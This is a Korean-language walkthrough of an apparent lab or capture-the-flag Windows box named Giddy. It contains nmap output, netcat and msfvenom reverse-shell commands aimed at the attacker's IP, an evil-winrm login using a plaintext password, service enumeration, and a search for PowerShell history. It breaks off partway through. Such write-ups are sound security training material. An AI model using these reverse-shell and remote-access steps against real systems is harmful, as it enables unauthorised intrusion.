1. 정찰
1.1. nmap
┌──(root㉿kali)-[/home/kali]
└─# nmap -sC -sV 10.129.96.140 --max-retries 1 --min-rate 5000 -p-
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-03 21:15 +04
Nmap scan report for 10.129.96.140
Host is up (0.19s latency).
Not shown: 65531 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
| http-methods:
|_ Potentially risky methods: TRACE
443/tcp open ssl/http Microsoft IIS httpd 10.0
| tls-alpn:
| h2
|_ http/1.1
|_http-title: IIS Windows Server
| ssl-cert: Subject: commonName=PowerShellWebAccessTestWebSite
| Not valid before: 2018-06-16T21:28:55
|_Not valid after: 2018-09-14T21:28:55
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_ssl-date: 2026-01-03T17:15:55+00:00; -7s from scanner time.
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: GIDDY
| NetBIOS_Domain_Name: GIDDY
| NetBIOS_Computer_Name: GIDDY
| DNS_Domain_Name: Giddy
| DNS_Computer_Name: Giddy
| Product_Version: 10.0.14393
|_ System_Time: 2026-01-03T17:15:48+00:00
| ssl-cert: Subject: commonName=Giddy
| Not valid before: 2026-01-02T17:11:17
|_Not valid after: 2026-07-04T17:11:17
|_ssl-date: 2026-01-03T17:15:55+00:00; -7s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -6s, deviation: 0s, median: -7s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 51.04 seconds
Powershell 에서 nc.exe 를 다운로드해서 실행하려 했으나 실행이 Block 되었다.
PS C:\Users\Stacy\Documents>
nc.exe 10.10.14.143 443
The term 'nc.exe' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spel
ling of the name, or if a path was included, verify that the path is correct and try again.
+ CategoryInfo : ObjectNotFound: (nc.exe:String) [], CommandNotFoundException
+ FullyQualifiedErrorId : CommandNotFoundException
PS C:\Users\Stacy\Documents>
.\nc.exe 10.10.14.143 443
Program 'nc.exe' failed to run: This program is blocked by group policy. For more information, contact your system admi
nistrator.
+ CategoryInfo : ResourceUnavailable: (:) [], ApplicationFailedException
+ FullyQualifiedErrorId : NativeCommandFailed
근데 evil-winrm 이 됨. 굳이 고생할 필요 없음.
┌──(root㉿kali)-[/home/kali/labs/Giddy]
└─# evil-winrm -i 10.129.96.140 -u stacy -p xNnWo6272k7x
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Stacy\Documents>
*Evil-WinRM* PS C:\Users\Stacy\Documents> whoami
giddy\stacy
*Evil-WinRM* PS C:\Users\Stacy\Documents> ls
Directory: C:\Users\Stacy\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 1/4/2026 3:52 AM 59392 nc.exe
-a---- 6/17/2018 9:36 AM 6 unifivideo
┌──(root㉿kali)-[/home/kali/labs/Giddy]
└─# msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.143 LPORT=443 -f exe -o rev443.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7168 bytes
Saved as: rev443.exe
*Evil-WinRM* PS C:\Users\Stacy\Documents> cd HKLM:\system\currentcontrolset\services
*Evil-WinRM* PS HKLM:\system\currentcontrolset\services> ls
Hive: HKEY_LOCAL_MACHINE\system\currentcontrolset\services
Name Property
---- --------
.NET CLR Data
.NET CLR Networking
.NET CLR Networking 4.0.0.0
.NET Data Provider for Oracle
.NET Data Provider for
SqlServer
.NET Memory Cache 4.0
.NETFramework
[...SNIP...]
UniFiVideoService Type : 16
Start : 2
ErrorControl : 1
ImagePath : C:\ProgramData\unifi-video\avService.exe //RS//UniFiVideoService
DisplayName : Ubiquiti UniFi Video
DependOnService : {Tcpip, Afd}
ObjectName : LocalSystem
Description : Ubiquiti UniFi Video Service
[...SNIP...]
최대 4096 개의 히스토리를 저장하는 것을 확인했고, 히스토리 파일이 어디에 저장되는지 확인했다.
*Evil-WinRM* PS HKLM:\system\currentcontrolset\services> (Get-PSReadLineOption).MaximumHistoryCount
4096
*Evil-WinRM* PS HKLM:\system\currentcontrolset\services> (Get-PSReadLineOption).HistorySavePath
C:\Users\Stacy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ServerRemoteHost_history.txt
실제로는 저장되고 있다는 파일인 ServerRemoteHost_history.txt 에 저장되고 있지 않았다. 해당 디렉토리 경로까지 찾아가서 확인해본 결과 해당 디렉토리 내부의 ConsoleHost_history.txt 파일이 존재하는 것을 확인할 수 있다.
*Evil-WinRM* PS HKLM:\system\currentcontrolset\services> type C:\Users\Stacy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ServerRemoteHost_history.txt
Cannot find path 'C:\Users\Stacy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ServerRemoteHost_history.txt' because it does not exist.
At line:1 char:1
+ type C:\Users\Stacy\AppData\Roaming\Microsoft\Windows\PowerShell\PSRe ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (C:\Users\Stacy\...ost_history.txt:String) [Get-Content], ItemNotFoundException
+ FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetContentCommand
*Evil-WinRM* PS HKLM:\system\currentcontrolset\services> cd C:\Users\Stacy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline
*Evil-WinRM* PS C:\Users\Stacy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline> ls
Directory: C:\Users\Stacy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 6/17/2018 9:48 AM 207 ConsoleHost_history.txt